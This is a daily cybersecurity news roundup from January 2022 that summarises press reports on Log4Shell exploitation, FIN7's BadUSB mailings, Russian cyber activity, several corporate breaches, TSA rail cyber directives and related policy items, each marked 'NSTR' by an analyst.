Saturday, January 8, 2022
China's plans for a national cybersecurity barrier. A US Federal role in the open-source software supply chain? A look at proposed reporting deadlines.
FROM THE MEDIA: China’s cyberspace regulator says it plans to establish a comprehensive internet governance system and construct a solid national cyber security barrier, Reuters reports. The statement added that China “will win the battle for core technologies in the information field” and emphasized the regulator’s goal of bolstering mainstream online opinion. The recently discovered Log4j vulnerability has drawn attention to the need to bolster the security of open-source software, and Politico posits that it’s time for the federal government to step in to support the open-source development community. Because most open-source software is developed by tech employees whose companies’ products rely on the code, the developer community is disconnected and not properly focused on security. The past year has seen some improvement efforts; the Linux Foundation’s Open Source Security Foundation drafted a vulnerability disclosure guide for developers, supplied guidance for building security protections into the code, and even created a security certificate for updates. And Google has promised to donate $100 million to open-source security. However, experts feel that government support is essential. Brian Behlendorf, the Open Source Security Foundation’s general manager, states, said federal grants as low as $50,000 could be enough to support a team devoted to open-source security. Consistent developer use of a software bill of materials (SBOM), a content list that details the provenance of the code, could help users detect vulnerable code, but few developers have the technology to maintain an accurate SBOM. Allan Friedman, a senior adviser and strategist at the US Cybersecurity and Infrastructure Security Agency who previously oversaw SBOM work at the National Telecommunications and Information Administration, explains, “Transparency in the software supply chain is going to be critical…to understand where our exposures are, where our risks are and where the opportunities to help are.” It’s worth noting that proposals for Federal involvement envision resources more than they do direction or regulation.
READ THE STORY: The Cyber Wire
ANALYST COMMENT: NSTR
Russian cyberattacks in Ukraine soar as invasion fears grow, security experts warn
FROM THE MEDIA: CYBERSECURITY experts are warning that a recent surge in Russian cyber attacks on Ukraine could prelude an invasion. The latest ISMG Security Report suggests the increase in Russian cyber interference in Ukrainian networks could be a warning that eastern Ukraine will face a physical attack. Cyber experts have expressed concerns about an apparent surge in Russian cyber attacks on Ukraine. Russia has already moved 175,000 soldiers to its border with Ukraine. The intentions of Russian President Vladimir Putin currently remain unclear but he's heavily criticized Ukraine's plans to join NATO. Cyber experts warned before Christmas that Russia had been advancing online disinformation to undermine Ukraine's president. ISMG's Mathew Schwartz said in the latest ISMG podcast that there's been an increase in Russian cyber operations in Ukraine since the beginning of December. Key government and civilian Ukrainian networks are said to have been targeted. Targeted networks include those belonging to Ukrainian banking and infrastructure firms.
READ THE STORY: The Sun
ANALYST COMMENT: NSTR
The Federal Bureau of Investigation (FBI) warns US companies that the FIN7 cybercriminals group is targeting the US defense industry with BadUSB devices
FROM THE MEDIA: The US Federal Bureau of Investigation issued a flash alert to warn that the financially motivated group FIN7 has sent malicious USB devices, BadUSB devices, to US companies over the past few months to infect their systems with the malware. The gang is using weaponized USB devices with the LilyGO logo, which are sent to the victims via United States Postal Service and United Parcel Service. FIN7 using this technique to target businesses in the transportation and insurance industries since August 2021, while it started targeting defense firms since November 2021. The operators impersonate Amazon and the US Department of Health & Human Services (HHS) to trick the victims into opening the packages and plugging the BadUSB devices into their systems. According to the alert, threat actors employed packages containing letters about COVID-19 guidelines or counterfeit gift cards and forged thank you notes. “Since August 2021, the FBI has received reports of several packages containing these USB devices, sent to US businesses in the transportation, insurance, and defense industries,” reads the flash alert issued by the FBI that was visioned by TheRecord. “The packages were sent using the United States Postal Service and United Parcel Service,” continues the alert. “There are two variations of packages—those imitating HHS [US Department of Health and Human Services ] are often accompanied by letters referencing COVID-19 guidelines enclosed with a USB; and those imitating Amazon arrived in a decorative gift box containing a fraudulent thank you letter, counterfeit gift card, and a USB.” Upon plugging the USB thumb drives into a computer, a BadUSB attack is triggered and the devices act as a keyboard (HID Emulator USB) to send commands to the system. In the attacks analyzed by the FBI, the attack would run PowerShell commands to download and install malicious payloads, including BlackMatter and REvil ransomware. The FIN7 group used a broad range of tools and malware such as Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION.
READ THE STORY: Security Affairs
ANALYST COMMENT: NSTR
NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon
FROM THE MEDIA: The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks. "The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure," the non-departmental public body said in an alert. "Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service." The web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.
READ THE STORY: THN
ANALYST COMMENT: NSTR
The anti-virus giant Norton is being criticized for automatically installing crypto miner on their users’ devices that mine Ethereum
FROM THE MEDIA: Norton 360 is popular antivirus software. However, it has come under fire because it is installing a cryptocurrency mining program on users’ devices. According to reports, the cryptocurrency miner was included in the Norton antivirus in June last year to help Norton 360 users earn some extra bucks from their graphics card. The tool is called Norton Crypto, and it mines Ethereum. Users can keep 85% of the cut while the remaining goes to NortonLifeLock. Norton 360 Equipped with Hard-to-Delete Crytpominer? According to Norton, the parent firm behind Norton360, the cloud-based services responsible for activating the antivirus program have offered users an option to profit from the scheme. Still, they have to agree to enable it. However, many users have complained that the mining tool embedded in the antivirus software is hard to delete and causes troubles with the device. A Twitter user first posted about the issue claiming that Norton 360 program has installed the mining tool on his computer through a program called NCrypt.exe that cannot be uninstalled.
READ THE STORY: HackRead
ANALYST COMMENT: NSTR
Cyber Command announces partnership with 84 universities
FROM THE MEDIA: U.S. Cyber Command announced it will partner with 84 universities across 34 states this year as part of a program to build up the nation’s cybersecurity workforce and familiarize students with military cyber programs. The partnership, part of the agency’s Academic Engagement Network, will give students at the university access to guest lecturers from U.S. CyberCom officials, non-public webinars about “pressing technical problems and non-technical problems” in cyberspace and other communications about changes in the cyber domain from the military agency. According to an announcement, U.S. Cyber Command Executive Director David Frederick held a virtual meeting with representatives from the schools on Thursday to provide details on specific programs and plans that will be offered over the next nine months. The engagements will be structured around four lines of effort that will “serve as an investment in creating a robust and accessible pool of qualified cyber professionals, including future workforce issues, applied cyber research, applied analytics and strategic issues. “Cyber Command’s goal for the AEN is to strengthen our relationships and communication with these participating institutions,” Frederick said in a statement. “This will improve and sustain our efforts to meet cyberspace educational requirements and workforce needs.” The participating universities were not named; SC Media has contacted U.S. Cyber Command’s media office for a full list of the partners, and is awaiting a response. Of the 84 partners, CyberCom said 69 are universities, 13 are community colleges, nine are minority serving institutions and four are military war and staff colleges. To be eligible for a partnership, schools must offer accredited two-year, four-year or post-graduate degree programs around cybersecurity and offer specialization or courses in computer science, cyber related engineering, cyber law, intelligence, applied analytics and other subjects with a nexus to cybersecurity. Cyber Command officials plan to offer additional details on the program and partnerships in a follow-on briefing in the near future.
READ THE STORY: SC Magazine
ANALYST COMMENT: NSTR
Russian submarines threatening undersea network of internet cables, says UK defense chief Sir Tony Radakin
FROM THE MEDIA: The boss of Britain's armed forces is warning Russian submarines are threatening a crucial network of underwater cables that carry information around the world. Admiral Sir Tony Radakin, who was appointed chief of the defence staff in October, told The Times newspaper the undersea cables that transmit internet data are "the world's real information system". Any attempt to damage them could be considered an "act of war", he added. Sir Tony - a former head of the Royal Navy - said, in his first interview since taking up the role, there had been a "phenomenal increase in Russian submarine and underwater activity" in the last 20 years. It meant Moscow could "put at risk and potentially exploit the world's real information system, which is undersea cables that go all around the world". "That is where predominantly all the world's information and traffic travels," he added. "Russia has grown the capability to put at threat those undersea cables and potentially exploit those undersea cables." The Royal Navy has been tracking Russian submarine activity during that period. A collision between a British Type 23 frigate, HMS Northumberland, and a Russian sub has sparked wider speculation about the extent of Russian cable-mapping activity. The collision, filmed in newly released footage by a documentary crew from Channel 5 working on a television series called Warship: Life At Sea, occurred in December 2020. Sir Tony also said in his interview that the UK should develop hypersonic missiles to keep up with other nations doing the same.
READ THE STORY: Sky News
ANALYST COMMENT: NSTR
Norwegian Media Company Amedia Suffered a Serious Cyber Attack That Left Newspapers Unprinted
FROM THE MEDIA: Norwegian media company Amedia suffered a cyber attack that shut down its computer systems, preventing the company from printing newspapers. According to the company, the incident also affected its advertising and subscription systems, preventing advertisers from ordering new ads and subscribers from enrolling or canceling their subscriptions. Amedia Executive Vice President of Technology Pål Nedregotten said the incident forced it to shut down systems administered by Amedia Teknologi. Nedregotten admitted that they were still analyzing the incident with the aim of preventing the full potential for damage. Although online newspapers were still available, it was unclear when the company would resume circulating printed newspapers. Amedia owns over 90 publications, the Avisenes Nyhetsbyrå media outlet, and Prime Print publishing in Russia. With a domestic readership of about 2.5 million, Amedia is one of the most popular media companies in the region. Cyber attack on a Norwegian media company potentially leaked personal information. The media company was still analyzing the nature and scope of the cyber attack, and has yet to determine whether the incident was a ransomware attack. According to the company’s statement posted on its website, Amedia could not rule out that subscriber and employee personal information was not compromised. Personal data stored on the compromised system and potentially exposed include customers’ names, addresses, phone numbers, and subscription history.
READ THE STORY: CPO Magazine
ANALYST COMMENT: NSTR
TSA Mandates Immediate Cyber Preparations for Rail Owners and Operators following its Imposition of Similar Requirements on Airports and Airlines
FROM THE MEDIA: On December 2, 2021, the Transportation Security Administration (TSA), within the Department of Homeland Security (DHS), announced two new Directives (the Directives) mandating cybersecurity measures for critical surface transportation systems. The Directives’ requirements cover owners and operators of high-risk freight railroads, passenger rail and transit. TSA also issued an information circular calling for low risk rail owners and operators and over the road bus owners and operators (those not covered by the first two Directives) to voluntarily adopt the same cybersecurity measures. These Directives follow the TSA’s recent updates to its aviation security programs to require that airport and airline operators implement the first two provisions above. They also represent the TSA’s second round of cybersecurity directives in 2021, arriving after the two pipeline requirement announcements in May and July. The TSA immediately implemented these new requirements, which took effect on December 31. High-Risk Freight Rail, Passenger Rail, and Rail Transit Operators Requirements. The first Directive, Enhancing Public Transportation and Passenger Railroad Cybersecurity, covers owners and operators of passenger railroad or rail-transit systems identified in 49 C.F.R. § 1582.101, while the second Directive, Enhancing Rail Cybersecurity, applies to freight railroads identified in 49 C.F.R. § 1580.101. According to the press release, these represent “higher-risk” freight railroads, passenger rail and rail transit.1 The Information Circular, Enhancing Surface Transportation Cybersecurity (the voluntary Directive) recommends but does not require that those owners and operators not covered by the first two Directives implement the same cybersecurity measures. These “lower-risk” transport systems include railroad owners and operators identified in 49 C.F.R. § 1580.1(a), passenger railroads, public transport agencies or rail transit system owners and operators identified in 49 C.F.R. § 1582.1, and over-the-road-bus owners and operators identified in 49 C.F.R. § 1584.1. A “cybersecurity incident” under the Directives includes any event that “jeopardizes, disrupts or otherwise impacts the integrity, confidentiality, or availability of computers, information or communications systems or networks” including any physical and virtual infrastructure those systems control or information resident on the system, or events under investigation as incidents.
READ THE STORY: JD Supra
ANALYST COMMENT: NSTR
3.7M FlexBooker Records Dumped on Hacker Forum
FROM THE MEDIA: Attackers are trading millions of records from a trio of pre-holiday breaches on an online forum. A threat group that identifies itself as Uawrongteam is dumping data stolen from FlexBooker – a popular online appointment scheduling tool for booking services ranging from counseling to haircuts – on a cybercriminal forum. The data from FlexBooker is being offered up by Uawrongteam, along with other databases stolen on the same day, Dec. 23, from Racing.com and Redbourne Group’s rediCASE case management software, BleepingComputer reported. FlexBooker sent a notification to its users, explaining that its Amazon AWS servers were compromised by what the company was able to identify as a distributed denial-of-service (DDoS) attack. FlexBooker customers include the brands GoDaddy, Chipotle, Bausch + Lomb and Krewe. “After working further with Amazon to understand what happened, we learned a certain set of data, including personal information of some customers, was accessed and downloaded,” the company said. Uawrongteam claimed that its stolen database contains 10 million lines, including payment details. FlexBooker said in its disclosure that it considers the matter resolved and is “… still monitoring for any lingering issues.” But the attack might not be over, warned Nasser Fattah with Shared Assessments. “We know that there are financial losses associated with system outages, hence, why security teams have all eyes on glass, so to speak, when there is a DDoS attack,” Fattah explained to Threatpost on Friday. “And when this happens, it is important to be prepared for the possibility of a multifaceted attack and be very diligent with monitoring other anomalies happening on the network.”
READ THE STORY: Threat Post
ANALYST COMMENT: NSTR
Paper of interest
Launching an Open Source Flight Database for Kazakhstan in Wake of Protests
FROM THE MEDIA: As the crisis in Kazakhstan has unfolded over recent days, open source researchers have again turned to social media and other online resources to make sense of events from afar. As Bellingcat has previously noted, flight tracking websites are a key part of this digital toolkit. The ability to follow, in real time, where high profile individuals, cargo flights, or even transport of soldiers to and from a conflict zone can provide crucial insight into a developing situation. For example, in Kazakhstan rumour’ have spread about the whereabouts of former President Nursultan Nazarbayev, with local media alleging that he has left the country with his two daughters. For now, claims such as these remain mere speculation – which is why a detailed database of flights may be a first step to assessing them. According to Joanna Lillis, a Kazakhstan-based journalist and author of a recent book about the country’s politics, “it wouldn’t be surprising if some members of the elite have left the country or were trying to urgently flee. They can see an angry mood among protesters and are worried about their fates if somehow protesters get hold of them”, Lillis said in an interview with Bellingcat. Military planes from neighboring Russia have also headed towards Kazakhstan in recent days as part of an agreement struck by the regional Collective Security Treaty Organization to help regain order, something which can again be monitored and tracked by flight monitoring platforms.
Bellingcat has thus launched an open source database of noteworthy flights to and from the country’s airports in a bid to better understand the recent and evolving dynamics in Kazakhstan. The database, entries for which start on January 3, is open to use and continues to be updated at the time of publication. You can view the database here.
READ THE STORY: Bellingcat
ANALYST COMMENT: NSTR
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com